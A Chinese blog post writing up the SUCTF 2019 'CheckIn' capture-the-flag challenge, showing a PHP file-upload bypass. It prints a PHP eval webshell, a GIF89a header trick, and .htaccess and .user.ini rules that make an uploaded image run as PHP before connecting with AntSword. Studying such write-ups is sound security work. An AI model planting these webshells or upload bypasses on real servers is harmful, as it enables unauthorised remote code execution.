[SUCTF 2019]CheckIn (.htaccess和.user.ini)

举报
开心星人 发表于 2022/11/22 20:43:37 2022/11/22
5.6k+ 0 0
【摘要】 evil.php<?php eval($_POST['evil'])?>抓包修改Content-Type: image/jpeg仍然是后缀名不合法更改后缀名为php3、php4、phtml等都不行将后缀名改成jpg(虽然绕过了,但是解析不了,所以没啥用)换一个一句话木马<script language="php">eval($_POST['evil'])</script>进行了文件头的校验G...

evil.php

<?php eval($_POST['evil'])?>

在这里插入图片描述
抓包修改Content-Type: image/jpeg
仍然是后缀名不合法

更改后缀名为php3、php4、phtml等都不行
将后缀名改成jpg(虽然绕过了,但是解析不了,所以没啥用)
在这里插入图片描述
换一个一句话木马

<script language="php">eval($_POST['evil'])</script>

在这里插入图片描述
进行了文件头的校验

GIF89a? <script language="php">eval($_POST['evil'])</script>

一般都是直接用这个就行了
在这里插入图片描述
成功了,但是无法解析

尝试.htaccess和.user.ini

.htaccess

<FilesMatch "evil.jpg">
SetHandler application/x-httpd-php
</FilesMatch>

需要加个文件头绕过
GIF89a? 
<FilesMatch "evil.jpg">
SetHandler application/x-httpd-php
</FilesMatch>

意思是如果文件中有一个evil.jpg的文件,他就会被解析为.php
在这里插入图片描述
上传成功

访问evil.jpg即
http://ec60414d-2ab8-462c-bb74-bc60f6a5597a.node4.buuoj.cn:81/uploads/uploads/c47b21fcf8f0bc8b3920541abd8024fd/evil.jpg

然后尝试使用antsword连接,但是发现连不上,不太确定哪里出了问题

尝试.user.ini

auto_prepend_file和auto_append_file
他们的作用就是指定一个文件(1.jpg),那么该文件就会被包含在要执行的php文件中(index.php)

.user.ini

GIF89a?
auto_prepend_file=evil.jpg

在这里插入图片描述
上传成功

但不知道什么原因(可能是时间限制,自动删除了),我们刚才上传的evil.jpg不在了,重新上传一下即可

然后访问http://ec60414d-2ab8-462c-bb74-bc60f6a5597a.node4.buuoj.cn:81/uploads/c47b21fcf8f0bc8b3920541abd8024fd/index.php
用antsword连接即可

【声明】本内容来自华为云开发者社区博主,不代表华为云及华为云开发者社区的观点和立场。转载时必须标注文章的来源(华为云社区)、文章链接、文章作者等基本信息,否则作者和本社区有权追究责任。如果您发现本社区中有涉嫌抄袭的内容,欢迎发送邮件进行举报,并提供相关证据,一经查实,本社区将立刻删除涉嫌侵权内容,举报邮箱: cloudbbs@huaweicloud.com
  • 点赞
  • 收藏
  • 关注作者

作者其他文章

评论(0

抱歉,系统识别当前为高风险访问,暂不支持该操作

    全部回复

    上滑加载中

    设置昵称

    在此一键设置昵称,即可参与社区互动!

    *长度不超过10个汉字或20个英文字符,设置后3个月内不可修改。

    *长度不超过10个汉字或20个英文字符,设置后3个月内不可修改。